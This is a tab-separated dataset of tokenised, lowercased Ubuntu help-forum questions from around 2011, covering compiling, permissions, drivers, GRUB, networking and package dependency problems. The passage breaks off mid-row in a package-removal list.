90338	how to compile a helloworld glib program ?	i ca n't compile that code under ubuntu 11.10 while it compiles normally under ubuntu 10.04 : # include < stdio.h > # include < glib.h > int main ( int argc , char** argv ) { glist* list = null ; list = g_list_append ( list , `` hello world ! `` ) ; printf ( `` the first item is ' % s'\n '' , g_list_first ( list ) - > data ) ; return 0 ; } $ gcc $ ( pkg-config -- cflags -- libs glib-2.0 ) hello_glib.c hello_glib.c : ( .text+0x24 ) : undefined reference to g_list_append hello_glib.c : ( .text+0x34 ) : undefined reference to g_list_first collect2 : ld returned 1 exit status i have the libglib2.0-dev installed , why the error then ?
90339	how do i set read/write permissions my hard drives ?	i 've recently installed ubuntu 11.10 on my laptop , but i ca n't do anything with my 1.5tb external drive , and my 500gb because i do n't have write permission . are there any specific commands i can use in the terminal to set the read/write permissions ? the external is ntfs , and the 500gb is ext4 .
90345	desktop launcher documentation ?	i prefer to create new desktop launchers ( .desktop files ) using just a text editor , for example to create an iotop launcher i write : [ desktop entry ] name=iotop exec=gksudo `` gnome-terminal -x iotop '' type=application but i have n't found any documentation on the format . can someone give me a link to the format specification ?
90350	rtl8192su-based wi-fi adapter disconnects permanently	i 've already tried all possible ( http : //ubuntuforums.org/showpost.php ? p=10129571 & postcount=43 ) solutions , no progress . i 'm in despair . in windows ( on the same machine ) this adapter works stably . device : trendnet tew-649ub . system details : ubuntu 11.10 ; leventov @ leventov-ubuntu : ~ $ uname -a linux leventov-ubuntu 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:56:25 utc 2011 x86_64 x86_64 x86_64 gnu/linux leventov @ leventov-ubuntu : ~ $ lsusb ... bus 002 device 002 : id 0bda:8172 realtek semiconductor corp. rtl8191s wlan adapter ... leventov @ leventov-ubuntu : ~ $ dmesg | grep 8712 # current driver [ 8.146510 ] r8712u : module is from the staging directory , the quality is unknown , you have been warned . [ 8.147113 ] r8712u : driverversion : v7_0.20100831 [ 8.147124 ] r8712u : register rtl8712_netdev_ops to netdev_ops [ 8.147127 ] r8712u : usb_speed_high with 4 endpoints [ 8.147478 ] r8712u : boot from efuse : autoload ok [ 8.551272 ] r8712u : customerid = 0x0000 [ 8.551275 ] r8712u : mac address from efuse = 00:14 : d1:6c:52:19 [ 8.551625 ] usbcore : registered new interface driver r8712u [ 9.501351 ] r8712u : loading firmware from `` rtlwifi/rtl8712u.bin '' [ 10.160471 ] r8712u : 1 rcr=0x153f00e [ 10.161241 ] r8712u : 2 rcr=0x553f00e leventov @ leventov-ubuntu : ~ $ lsmod | grep 8712 r8712u 189049 0 t update . the problem remains in ubuntu 12.04 , 12.10 , 13.04 , 13.10 and 14.04 ( with respective ndiswrapper updates ) . ridiculous .
90352	ext3 partition seems to disappear after reboot	i got a local ubuntu development server running ubuntu server 9.04 . ( yes i know it 's old ! ) anyway , it froze the other day and on reboot it wanted to check the disk , errors were found . afraid of losing the data i immediately mirrored the drive using norton ghost to an image file ( .gho ) on a backup disk . and surely enough , the drive failed almost immediately after the backup . now i 've got a working image file that has all the data , nothing seems to be missing . after copying the image to a new drive i wanted to boot , but somehow grub did n't get to booting and said `` /dev/mapper/hostname-root '' ( the bootup root ) was missing . so i went into the grub menu and changed the boot commands so the root was set to `` /dev/sda6/ '' ( my root partition ) directly . to my delight , it booted ! with just one problem ... whenever i reboot ( sometimes it takes two reboots ) , the root partition seems to be gone ! neither grub nor a ubuntu livecd will detect the partition any longer and it wo n't boot . if i do n't boot the disk after the copying , the livecd will detect it and i can even mount it and access my data . norton ghost will see the root partition merged with the swap partition ( which is suddenly about 500gb in size ) and the livecd wo n't detect it at all . i 've replicated this about 5 times with 2 different ( brand new ) drives by writing the .gho image to a new drive . from running ubuntu , after boot : admin @ web-ubuntu : ~ $ sudo blkid /dev/sda5 : uuid= '' cc95c47b-fc1c-4918-9f79-706db2af98fd '' type= '' ext2 '' /dev/sda6 : uuid= '' ba898223-7a86-40d3-bb11-267562af4902 '' type= '' ext3 '' /dev/sda7 : type= '' swap '' admin @ web-ubuntu : ~ $ mount /dev/sda6 on / type ext3 ( rw , relatime , errors=remount-ro , usrquota , grpquota ) tmpfs on /lib/init/rw type tmpfs ( rw , nosuid , mode=0755 ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) varrun on /var/run type tmpfs ( rw , nosuid , mode=0755 ) varlock on /var/lock type tmpfs ( rw , noexec , nosuid , nodev , mode=1777 ) udev on /dev type tmpfs ( rw , mode=0755 ) tmpfs on /dev/shm type tmpfs ( rw , nosuid , nodev ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=620 ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) lrm on /lib/modules/2.6.28-19-server/volatile type tmpfs ( rw , mode=755 ) /dev/sda5 on /boot type ext2 ( rw , relatime ) admin @ web-ubuntu : ~ $ sudo fdisk -l [ sudo ] password for admin : lege partitie ( 6 ) wordt weggelaten [ en : empty partition ( 6 ) is omitted ] schijf /dev/sda : 500.1 gb , 500107862016 bytes [ en : schijf = disk ] 255 koppen , 63 sectoren/spoor , 60801 cilinders [ en : koppen = heads , sectoren = sectors , spoor = track , cilinders = cylinders ] eenheid = cilinders van 16065 * 512 = 8225280 bytes [ en : unit = cylinders of ] schijf-id : 0x0001a71a [ en : disk-id ] apparaat opstart begin einde blokken id systeem /dev/sda1 2 60801 488376000 f w95 uitgeb . ( lba ) /dev/sda5 60770 60801 257008+ 83 linux
90355	why ca n't i execute any .sh scripts ?	when i try to run a .sh script in terminal it says i have no permissions to do that . and when i try to run an executable nothing happens at all !
90362	installing python-pygments , importerror	i want tot use pygments in my python app . at first , i installed pygments like this : $ sudo python setup.py install -- prefix=/usr/local /usr/lib/python2.7/distutils/dist.py:267 : userwarning : unknown distribution option : 'zip_safe' warnings.warn ( msg ) /usr/lib/python2.7/distutils/dist.py:267 : userwarning : unknown distribution option : 'include_package_data' warnings.warn ( msg ) running install running build running build_py running build_scripts running install_lib running install_scripts changing mode of /usr/local/bin/pygmentize to 755 running install_egg_info removing /usr/local/lib/python2.7/dist-packages/pygments-1.4-py2.7.egg-info writing /usr/local/lib/python2.7/dist-packages/pygments-1.4-py2.7.egg-info after getting import error ( importerror : can not import name highlight ) when trying to from pygments import highlight , and find out that there is a python-pygments package , i installed it from software center . now it was installed in /usr/share/pyshared/pygments and there are symlinks in /usr/lib/python2.7/dist-packages/pygments point to that location which is much better then /usr/local/lib/python2.7/dist-packages with manual install . but i keep getting importerror . what am i doing wrong ?
90364	what to do if dpkg is stuck while updating packages ?	i just installed kubuntu 11.10 and started to update packages . all packages downloaded and now it 's stuck running dpkg , at 53 % , for hours . what can i do now to not break anything ? should i reset my computer ?
90375	cron job and permissions	i have set a cron job to execute a bash script . if i change the permissions of the script to ( others : none ) will it still be executed ? thanks a lot
90376	ca n't change file permissions on external hard drive	i have recently installed an external hard drive usb on my ubuntu 11.10 server but i can not use apache to allow web browsing . i think it is a permissions problem but i can not change the permissions on ssh using chmod . i have webmin installed but that seems to be no help either . any offers greatly received . chris
90377	how to install a package in recovery mode ?	i was using ubuntu 11.10 and installed the kde desktop and i was happy with that . but i wanted to get my old login screen back so i removed the package kdm . when i boot my pc now , it keeps booting and nothing happens . how can i add the kdm package again ? i got into recovery mode , terminal and tried to execute sudo apt-get instal kdm but i got an error message . w : not using locking for read only lock file /var/lib/dpkg/lock e : unable to write to /var/cache/apt/ e : the package lists or status file could not be parsed or opened i 'm pretty desperate now , could somebody please help me ?
90378	can not boot 11.10 after 8.04 installation	i recently installed ubuntu 8.04 , before that i had 11.10 . my intend was to use both of them . after installation of 8.04 , an item for 11.10 did n't appear in grub . what can i do to get it back ? ps : 11.10 using ext4 , 8.04 using ext3 , so i ca n't do mount operations .
90382	is it useful to run ubuntu friendly off a liveusb ?	to secure maximum data for ubuntu friendly , the maximum number of computers should be tested . however , it is not possible for me ( or anyone ) to install ubuntu on all the computers we have access to . would running ubuntu friendly within an ubuntu liveusb give accurate results ? for example , some people report certain deficiencies when running ubuntu off a liveusb as opposed to an installation .
90385	problem with ./configure while installing from tar	i am trying to install a more recent version of a program than what is available via synaptic , but i am running into a few problems . and i have one question beyond those problems . this is what i 've done so far . i downloaded the .tar.gz2 , created a folder in /usr/local/ for the program . call it app . so i now have a folder /usr/local/app . inside the folder i extracted the archive . i then navigated a terminal to that folder and ran sudo apt-get build-dep app it downloaded and installed several libraries and i thought i was set . however , when i ran sh ./configure i encountered the following problem : checking for glib - version > = 2.14.0 ... 'pkg-config -- modversion glib-2.0 ' returned 2.14.0 , but glib ( 2.28.6 ) was found ! if pkg-config was correct , then it is best to remove the old version of glib . you may also be able to fix the error by modifying your ld_library_path enviroment variable , or by editing /etc/ld.so.conf . make sure you have run ldconfig if that is required on your system . if pkg-config was wrong , set the environment variable pkg_config_path to point to the correct configuration files ok , no problem . i went out and found glib 2.14.0 . i created a new folder /usr/local/glib . i extracted the archive to that folder . i ran the sh ./configure for glib , and it went off without a hitch . i then ran make install for glib . again , no problems . it installed successfully . so now i was ready to rock ! back i went into /usr/local/app , and once again i ran sh ./configure . and i got the exact same error message . i am not understanding the message as it appears to say that ./configure requires glib version 2.14.0 or later , and it found version 2.28.6 , which would more than meet the requirement . i 'm not great with shell scripts so i am somewhat , well , entirely , confused as to what it is this thing wants from me . i am running ubuntu 11.04 on a toshiba satellite . as you can see i 'm not exactly a terminal warrior , but i can usually scratch my way through most problems and have learned quite a bit as i go . this one just has me stumped .
90386	kernel compiling help	i was compiling the kernel 3.2 when it was taken more time than the walkthrough indicated . so i cancelled it , realizing that it took 5 gb of hard drive space . i deleted all the kernel folders downloaded but that still did n't recover the space . any suggestions ?
90387	wireless driver installation on lg-x130 8.04	recently installed 8.04 . i ca n't connect through wireless . i have a wired connection . my card is a ralink rt3090
90390	unable to run gnome shell .	i used terminal to install gnome shell ( sudo apt-get install gnome-shell ) and restarted , but when i log on using 'gnome ' , the background and icons on the desktop load , but the gnome panel and the one at the top cease to load . help please . i am using : an ibm thinkpad r50e , 32-bit , intel celeron m processor , intel速 852gm/855gm x86/mmx/sse2 graphics card .
90397	upgrading from 10.04 to 11.10	i am in the process of upgrading my computers to 11.10 . i just did an upgrade on a netbook from a netbook version to 11.10 and although it works quite smoothly on this netbook it did n't save the home folder or my settings etc . i thought i had been careful to select the upgrade choice but..maybe it was just that from netbook > 11.10 was a bridge to far ... i am about to update a dual core notebook from 10.04 > 11.10 and i have copied the home folder into the windows partition for now as i guess its safe there . i know i may have to do a complete new installation unless i leap frog on a 10.10 upgrade or something so i do n't mind that as long as i can conserve some of my settings and bookmarks etc . i ca n't see how to save the firefox bookmarks as i would like to copy them somewhere just in case ( even if its only an htlm fine in home documents for now ) can someone tell me if moving from 10.04 > 11.10 will be a wipe everything and just in case where i can go to get and copy the firefox bookmarks before i start .
90402	how to change the music player in the unity panel - the default is banshee	from what i know , a music player requires an extension with a mpris2 spec to be listed in the drop down menu of the ubuntu 11.10 unity panel sound applet . the default player ( for music files ) and the default music player listed in the unity panel sound applet 's drop down menu is both banshee . setting the default mp3 player does not change the default music player in the unity panel drop down menu , since the selected default music player requires the mpris2 extension . i 'm not sure whether applications such as qmmp , audicious and vlc have these extensions . are there any methods to write a mpris2 spec for any given music player so that you can add it to the unity panel , or are we completely dependent on the developers of the music players to provide mpris2 spec extensions ?
90406	startup script for a specific user on ubuntu server	here is the command i want to be run at startup : vboxheadless -s `` pfsense '' as user `` enedene '' . could someone give me step by step instructions ?
90414	how to upgrade the alsa driver ?	i am using ubuntu 10.04.1 lts . how can i upgrade the alsa driver from 1.0.20 to 1.0.23 ?
90415	how do i disable the lock screen when resuming from suspend or hibernate without losing ability to lock screen manually ?	i would like to bypass the password prompt after resuming from suspend or hibernate in ubuntu 11.10 . i tried : gsettings set org.gnome.desktop.lockdown disable-lock-screen 'true' but doing so i could n't lock the screen manually any more by hitting ctrl+alt+l . it also removed the `` lock screen '' menu item on the power button menu that i get when i click on the top right of the screen . i would like to keep these two features while just removing the lock screen when the system resumes . any ideas ?
90418	is the hdd spinning when it is unmounted ?	have a pc with multiple hdds some used only for backup . should i leave them unmounted ? is the power consumption less when the hdd is unmounted ? do the hdds spin when unmounted ? thanks a lot
90419	gnome-shell-extensions-user-theme wo n't install due to unmet dependencies	i have gnome-tweak-tool install and use it regulary . i can not however install the gnome-shell-extensions-user-theme to change the shell . i already have the ppa but when it put sudo apt-get install gnome-shell-extensions-user-theme into the terminal i get this output . dvorak @ dvorak-g51vx : ~ $ sudo apt-get install gnome-shell-extensions-user-theme [ sudo ] password for dvorak : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-shell-extensions-user-theme : depends : gnome-shell-extensions-common but it is not going to be installed e : unable to correct problems , you have held broken packages . can anyone elaborate on what i am doing wrong ? i have tried to both install and remove both the unmet dependencies with the same error .
90424	accesing a folder shared by ubuntu 11.10 laptop by ubuntu 11.10 pc does not work	i have a desktop pc and a notebook in the same network . each of them is running ubuntu 11.10 . i shared a folder on my notebook which i somehow can not access by my pc . here is what i did so far : on the notebook i right clicked on my home folder and went to properties - > share where i marked share this folder and allow others to create and delete files in this folder . it asked me for installing some services . they failed . so i did manually sudo apt-get install samba . worked fine . now i went to my pc an opened my home folder . above in the menu i selected go- > network . there i pressed ctrl+l and entered the local ip address from my notebook . but somehow it ca n't find it . is there more configuration , that i have to do ? i appreciate every help , thanks ! ps : sometimes it says error : failed to retrieve share list from server please select another viewer and try again . i refer to this picture in one of the comments below . it is not directly related to the formulation of my initial question but to a solution presented below by @ lumbric in the comments .
90433	11.10 x86 - memory ram problem ( shows 3.4 gb when 8 gb are installed )	i recently installed ubuntu 11.10 x86 on a new computer that has 2 x 4 gb ram installed ( 8 gb total ) . but when i go to the ubuntu system monitor it only shows 3.4 gb of memory ( and 8 gb swap ) . i also have a windows 7 installed with dual boot on the same computer , and there it shows 8 gb ram in `` control panel > system '' . the bios also recognize the 8 gbs . i thought this could be a problem of the x86 release , and i needed to use x64 , but i just asked a friend that has the same computer with ubuntu 11.04 x86 and he says the system monitor shows him 8 gb of ram . what could i try to get ubuntu to recognize the 8 gb of ram ? i really do n't even know where to start testing . $ sudo dmidecode -- type 17 | grep -e `` size|form factor|memory device|type '' [ sudo ] password for revered : memory device size : 4096 mb form factor : dimm type : unknown type detail : none memory device size : 4096 mb form factor : dimm type : unknown type detail : none memory device size : no module installed form factor : dimm type : unknown type detail : none memory device size : no module installed form factor : dimm type : unknown type detail : none $ free total used free shared buffers cached mem : 3608164 566356 3041808 0 36748 222304 -/+ buffers/cache : 307304 3300860 swap : 8369148 0 8369148
90435	video and audio scrolling not work when using html5 audio on a webpage	upload any webm or theora video or ogg audio . then try to play them with browser or embed into web page using html5 < video > or < audio > tags . playback scrolling does not work .
90437	how to make `` changing mac adress '' a script the best way ?	i figured out how to change my mac address of my network card : sudo ip addr # show details sudo ifconfig eth0 down # deactivate network card sudo ifconfig eth0 hw ether desired_mac_address # change mac address sudo ifconfig eth0 up # activate network card sudo ip addr # show details again what would be the best way to make this a script which i could start each time i need this modification ? also where do i have to put this generated script ? what is the standard folder for this ? i do n't want it to be started every time ubuntu starts . ( but it would be nice to know how this is done , though . where would be the best place to store it in that case ? ) appreciate any suggestions !
90438	dell inspiron n5010 with ati overheating	i have a dell inspiron n5010 with ati radeon 5470 1gb graphics card . i am dual booting windows 7 and ubuntu 11.10 64bit and for the graphics card i am using open source graphics drivers which are preinstalled . after installing ubuntu i notice that the laptop is getting overheated while ubuntu is running , but with windows it is ok . the temperature is always over 58 degree celsius and laptop fan is always running . could this be because of the graphics card ? please help me fix the problem ?
90439	moved root and swap directories , how can i reconfigure grub2 ?	i 'm on ubuntu 11.10 64bit booting using refit on a 8,3 2011 macbook pro . i recently switched out the hard drive and modified the order of the partitions when duplicating the disk . everything 's working fine , it 's just that i get a `` missing operating system '' message when trying to boot into linux . i 'm assuming that the problem is that what was once root at /dev/sda5 is now something else . how can i update grub2 to point to the right partitions for my root directory and swap ? i know which partitions are which , i just need to reconfigure things . ( grub is installed at /dev/sda4 , not /dev/sda , to allow refit to work . ) i already tried using boot-repair , but it did n't fix things as it still wo n't boot . i 'm currently running from a livecd and i 've mounted the drive , looking for the right configuration file . what do i need to change and where ?
90441	dns and vpn issues	i recently purchased a year contract for a kvm 512mb vps running ubuntu 11.04 . i 'm having some issues setting up some things on it though - two in particular that i just ca n't for the life of me figure out . okay , so i 'm trying to setup pptpd as my vpn for my iphone and my mac when i 'm out on wireless networks . i 'm able to login and the chap authenticates but that 's as far as i get , no domains will resolve and end up loading forever , i uncommented ms-dns lines as someone had recommended to me and changed the dns servers to googles public ones with no luck , is there something i 'm missing ? ( it 's probably staring me in the face . ) my second issue is that i have managed to setup lamp but am having a problem with my domain , i have pointed the dns at 123-reg to my vps 's ip and the 'www . ' resolves properly , but when i try to go to the domain without the 'www . ' i get the apache landing page ( `` the web server software is running but no content has been added , yet . '' ) i 'm pretty sure there 's something i 've got ta configure in apache for the virtual host but i 'm missing it . apart from these minor set-backs i 'm enjoying the low-level configuration options of having a vps and love managing my own server . thanks !
90447	how to make boxee work on 11.04 and above ?	i am trying to install boxee on ubuntu 11.04 but it was only released for 10.10 . i am looking for a detail step by step guide to install boxee on any ubuntu 11.04 or above .
90452	how to wipe hdd , i have no f8 or f12 key to press while booting	while installing ubuntu on my new commodore 64 , i hit the ac adapter , shutting off power to the whole computer . so i restarted and ubuntu surprising came up , even after the computer shutting off during the install . but i am running on a very broken ubuntu . there is a install release icon , and when i run it it take me to the install , but it ca n't install ubuntu cause it ca n't de-mount the drive . i tried booting to my live usb but this keyboard does n't have an f8 or f12 key so i ca n't get to a boot menu . please help ! i can not run most programs like gparted . i want to just format the drive but it wo n't let me .
90457	what to do with overheated gpu ? ( amd hd 5470 )	i 'm currently investigating what makes my dell studio 1558 so slow sometimes . i noticed that it was getting really hot , and started checking temperature . it seems that my gpu ( amd radeon hd 5470 ) is getting really really hot ( even on a laptop stand ) . while standing on a desk , it easily gets to 80째c ( 176째f ) i 'm using the fglrx version that came with ubuntu 11.10 , the catalyst 11.8 driver . so , my questions now are : what are the risks of an overheated gpu ? does an overheated gpu cause my laptop to slow down ? can i fix this ? extra info : i tried installing catalyst 11.12 manually , but it kept on saying it found an older installation ( sudo apt-get purge fglrx* was not enough it seemed ) . in `` additional drivers '' , i am not able to install the post-release version of fglrx when i remove fglrx , i only get a black screen at boot hardware : dell studio 1558 - i5 cpu @ 2,40 ghz - 8gb ddr3 memory - amd hd 5470
90459	how can i reset recent documents on every login ?	i want to create a script that allow the recent document to be reset every time i log . i have 10 public computer ( internet cafăš ) using ubuntu . now , i have 10+ documents in my recent documents on each ( which are the users ) and i want to erase these to make sure the next customer does not open it . my idea is to copy a file ( from a usb or network or something ) and overwrite the file everytime someone log off is there a better way ? if not how can i do this ?
90461	files written in ubuntu disappear in windows	i have a strange problem with a dual boot laptop , in where i have a ntfs partition . when i write files in the ntfs patitions everything seems fine . even if i restart ubuntu the files still are there , but when i boot in windows and access the disk the data disapears , and desapears in both systems . in windows i have full permitions , but in ubuntu root is the owner of that filesystem .
90463	is there a way to disable the new feature in grub2 where it collapses all your old kernels ?	for example if i have more than one linux kernel i like to boot and i maintain my own /boot properly ... i do n't want the list collapsed . i want to choose the appropriate installation ( one for opencl , one for wireless stuff , one for common usage , one for anonymity , etc ) .
90468	authentication problem - and i still ca n't change the password	my question has been previously asked by other users , but has been dismissed by those who answered . i changed the password to blank , but ubuntu still keeps on asking me for authentication every time i open a program and both blank and my old password do not work . i am certain i do remember my old password . i tried changing it in grub but when i go to the console in root and type passwd [ my account name ] then asks me to type and retype my new password the console does not react to my typing . when i still type my password , assuming it simply just does not show it but it receives it i get an error : token malfunction , password unchanged . please help , i need my computer for work .
90469	how do i edit the classic menu indicator	i installed the classic menu indicator that can be installed from ppa : diesch/testing ( some really cool packages there btw ) . now i want to edit the main menu , reorganize some of the applications , make my own catergories etc . will installing alacarte allow me to edit this menu as i used to be able to in gnome 2 ? also , as per this question , how can these cool little indicators be moved across the the unity panel ? i refuse to install gnome-panel or gnome-session packages anymore since there appears to be too many conflicts with these and the new unity interface .
90471	persist commands typed to grub rescue	after deleting old linux partitions in order to free space on hard disk i got an error from grub error : no such partition and then i see a grub rescue > prompt . after googling around i found that in order to boot normally i have to type following commands set prefix= ( hd0 , msdos5 ) /boot/grub set root= ( hd0 , msdos5 ) insmod /boot/grub/linux.mod linux /vmlinuz root=/dev/sda5 ro initrd /initrd.img boot here is the boot info summary report created by boot-repair . however , on each reboot i have to type this again . how can i tell to grub once and forever what configuration file to use .
90480	ca n't connect to any networks with an acer aspire 6930 using an intel 5100 wireless card	i have an acer aspire 6930 with an intel 5100 wifi chip set . the wireless worked in windows 7 , but my wife has an unparalleled mastery of finding malware in windows , so to make things a bit easier on myself , i decided to set up ubuntu for her . problem is , now the wireless is busted ... wired network works flawlessly . i can scan networks just fine , pick up all of them that i would expect to see in the neighborhood , but ca n't connect to anything . error message when trying to connect switches back and forth between `` bad password '' and `` ca n't obtain ip address '' errors . i 've double checked the password is correct , still spits that error from time to time . used another machine to setup an ad-hoc network , with no password , and it gives the `` ca n't obtain ip address '' error all the time when trying to connect to that . the other interesting thing i noticed was that trying to enable the computer into an ad-hoc hot spot does n't work either ( via system settings > > wireless > > use as hot spot ) . it will show the hot spot information briefly , but as soon as i refresh my network list on another machine , to try to connect , the screen goes back to the default showing what network ( none ) i 'm connected to . any ideas ?
90482	can 64-bit be dual booted with 32-bit windows ?	i 'm currently running 64-bit ubuntu on a computer that came with windows xp 32-bit . is it possible to dual boot windows 32-bit with ubuntu 64-bit ?
90490	tty terminal in hdmi mode	today i was going to open a tty ( tty1 by pressing ctrl+alt+f1 ) and since i am using hdmi somehow the monitor lost signal ( the tv monitor appeared blue saying no signal ) . the only way to fix it was going back to tty7 ( the gui version of tty1 ) . this does not happen in vga only in hdmi . how can i see the tty terminals ( tty1 to tty6 ) in hdmi mode . i am using a tv monitor with 1080 capabilities . note : as mentioned by tumbleweed i am indeed using the nvida proprietary drivers .
90491	how to fix network disconnected error with a zte 3g mobile broadband modem	i was using a `` zte '' 3g mobile broadband to connect with the internet . it had some hardware issues , and i bought a new `` prolink '' 3g mobile broadband . when i try to connect it , ubuntu shows a `` network disconnected '' message . ( then the device turns off ) how ever i found a temporary solution . i ran the following command on terminal , sudo killall modem-manager then i unplugged the mobile broadband device , and plugged it again . few seconds later , i successfully connected to the internet from network manager . now i have to do this every time ubuntu starts . ( i tried a command in a forum ( which i can not remember ) to view the current network device . it showed the detail of my old mobile broadband. )
90492	persisting keyboard light state on boot/shutdown	2011 8,3 macbook pro running 64bit 11.10 . the keyboard backlight keys are working great , but how can i make them persist state across reboots ? i 'd like to record the current keyboard backlight state when shutting down and restore it when starting up so as to make things super cool and seamless from reboot to reboot . is this possible ? is there a way that i could write a script to do this ?
90493	opening home folder in xfce changes the xfce desktop to gnome	i installed xfce on ubuntu 11.10 . i already had gnome-shell installed as i was previously using gnome 'classic ' . now xfce works fine . but as soon as i open the home folder or any other folder for that matter , the xfce desktop changes to the gnome-one ( as in wallpaper and icons etc.. ) . how can i stop this ?
90494	what happened to the opera-next package ?	a week ago i noticed opera-next package in new in repository synaptics ' filter . so i installed it to test some html . today i noticed that it has replaced x-www-browser alternative and tried to reproduce it but it was no longer in the repository . i do n't remember enabling/disabling ppas so it could be from official partner repository . and now it 's gone . was there some announcement about why was it removed ?
90495	some windows render slow , others fast ?	2011 8,3 macbook pro running 64bit 11.10 . i 'm having a pretty weird problem here . after installing fglrx-updates and disabling opengl/sync to vblank and disabling composite/detect refresh rate , graphics are running great here with high fps . then , after a while , weird stuff happens . the older windows are , the slower they get when being dragged and rendered . i 'm in the process of uploading a video to demonstrate this , but in the meantime , has this been seen before ? why on earth would certain windows be rendered slower than others ?
90499	how to install tata photon plus ( vme 101 olive ) ?	i want to install vme 101 olive with latest version of ubuntu also i need to know if there is any interface to run .exe files in the same . please help me i am a novice for ubuntu .
90500	can i get sensible labels for lm-sensors output for `` applesmc-isa-0300 '' ?	2011 8,3 macbook pro running 64bit 11.10 . when i run sensors from the lm-sensors package , i get a lot of information , but no way to understand it : coretemp-isa-0000 adapter : isa adapter physical id 0 : +53.0°c ( high = +86.0°c , crit = +100.0°c ) core 0 : +53.0°c ( high = +86.0°c , crit = +100.0°c ) core 1 : +52.0°c ( high = +86.0°c , crit = +100.0°c ) core 2 : +50.0°c ( high = +86.0°c , crit = +100.0°c ) core 3 : +49.0°c ( high = +86.0°c , crit = +100.0°c ) applesmc-isa-0300 adapter : isa adapter left side : 2001 rpm ( min = 2000 rpm ) right side : 2001 rpm ( min = 2000 rpm ) tb0t : +33.2°c tb1t : +33.2°c tb2t : +29.0°c tc0c : +52.8°c tc0d : +47.2°c tc0e : +51.8°c tc0f : +53.0°c tc0j : +1.0°c tc0p : +44.5°c tc1c : +52.0°c tc2c : +52.0°c tc3c : +52.0°c tc4c : +52.0°c tcfc : +0.2°c tcgc : +51.0°c tcsa : +52.0°c tctd : +0.0°c tg0d : +44.5°c tg0p : +43.2°c thsp : +37.5°c tm0s : +57.5°c tmbs : +0.0°c tp0p : +50.0°c tpcd : +55.0°c the core temp info is really useful and i 'm pretty sure that left/right side refers to the two fans within , but otherwise , i have no idea what this information means . is there something i can use to normalize this information ?
90504	why does time change in ubuntu after installing windows	today i was installing windows 7 on the same computer i have ubuntu . for some reason , after installing windows 7 and going back to ubuntu the time went from the correct hour at that moment , 12:30pm to 7:30am . this happened after installing windows 7 . for what i understand the bios has a time set , ubuntu has the same time that is shown in the bios when installing it . at least up to this point is what i have seen . now after installing windows 7 ( and believe me this is only for testing the performance of windows 7 against ubuntu in which case windows 7 is falling behind a lot on the same hardware ) the time changes in ubuntu to the wrong one that is set in windows 7 . i actually do not change the time in windows 7 since this is one of the checks i am doing to see if the operating system can correctly grab the time . windows 7 fails . ubuntu does not but windows 7 actually changes the time for ubuntu if i boot with it afterwards . so my question is , why/how does time change in ubuntu after installing windows . note - i have set ubuntu time to `` manual '' instead of grabbing it from the internet just to test out this .
90506	how to delete gwibber history ?	how do i delete gwibber history in 11.10 ? i deleted the account and created the account again , but some of the tweets deleted on the web still appear on gwibber .
90507	will aptitude be added back in 12.04 or future versions ?	since there is more space in the iso ( 750mb for now ) for the 12.04 version and the limit of 700mb is removed , has there been any thoughts about adding aptitude to the command line tools . i ask this since , even though apt-get is recommended , i still find myself working better with aptitude since it has friendlier , all in one command features . has it been considered for 12.04 or future versions ?
90513	how do i change my keyboard shortcuts in xubuntu ?	i am a new xubuntu user . earlier when using gnome , i was able to configure several desktop shortcuts , particularly for navigation between workspaces . but , now in xubuntu , i can not find those options . where can i find those options .
90515	where do files ending with a ~ come from ?	sometimes duplicate filenames occur while working on ubuntu which differ only by a ~ from the original filenames . i know kate generates backup files and calls them your_file.py.swp . is this something similar ? if yes which program generates them ? and why do n't they disappear ?
90522	update-manager not working due to 404 error	i have the following error failed to download repository information check your internet connection.. w : failed to fetch http : //ppa.launchpad.net/mozillateam/firefox-stable/ubuntu/dists/oneiric/main/source/sources/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/mozillateam/firefox-stable/ubuntu/dists/oneiric/main/source/sources/dists/oneiric/main/binary-i386/packages 404 not found
90526	sun 's jdk on ubuntu 11.10 server edition	how do i install sun 's jdk6 on ubuntu 11.10 on command line ?
90533	installing php5 gives an error for some unment dependencies !	when i try yo install php5 using sudo aptitude install php5 i get the following error . the following packages have unmet dependencies : apache2-mpm-worker : conflicts : apache2-mpm which is a virtual package . apache2-mpm-prefork : conflicts : apache2-mpm which is a virtual package . internal error : found 2 ( choice - > promotion ) mappings for a single choice . the following actions will resolve these dependencies : remove the following packages : 1 ) apache2-mpm-worker 2 ) flashplugin-downloader 3 ) flashplugin-installer 4 ) libasound2 5 ) libasound2-plugins 6 ) libasyncns0 7 ) libatk1.0-0 8 ) libavahi-client3 9 ) libavahi-common3 10 ) libc6 11 ) libcairo2 12 ) libcomerr2 13 ) libcups2 14 ) libcurl3 15 ) libdatrie1 16 ) libdb5.1 17 ) libdbus-1-3 18 ) libexpat1 19 ) libffi6 20 ) libflac8 21 ) libfontconfig1 22 ) libfreetype6 23 ) libgcc1 24 ) libgcrypt11 25 ) libgdk-pixbuf2.0-0 26 ) libglib2.0-0 27 ) libgnutls26 28 ) libgpg-error0 29 ) libgssapi-krb5-2 30 ) libgtk2.0-0 31 ) libice6 32 ) libidn11 33 ) libjack-jackd2-0 34 ) libjasper1 35 ) libjpeg62 36 ) libjson0 37 ) libk5crypto3 38 ) libkeyutils1 39 ) libkrb5-3 40 ) libkrb5support0 41 ) libldap-2.4-2 42 ) libnspr4 43 ) libnspr4-0d 44 ) libnss3 45 ) libnss3-1d 46 ) libogg0 47 ) libpango1.0-0 48 ) libpcre3 49 ) libpixman-1-0 50 ) libpng12-0 51 ) libpulse0 52 ) librtmp0 53 ) libsamplerate0 54 ) libsasl2-2 55 ) libsasl2-modules 56 ) libselinux1 57 ) libsm6 58 ) libsndfile1 59 ) libspeexdsp1 60 ) libsqlite3-0 61 ) libssl1.0.0 62 ) libstdc++6 63 ) libtasn1-3 64 ) libthai0 65 ) libtiff4 66 ) libuuid1 67 ) libvorbis0a 68 ) libvorbisenc2 69 ) libwrap0 70 ) libx11-6 71 ) libxau6 72 ) libxcb-render0 73 ) libxcb-shm0 74 ) libxcb1 75 ) libxcomposite1 76 ) libxcursor1 77 ) libxdamage1 78 ) libxdmcp6 79 ) libxext6 80 ) 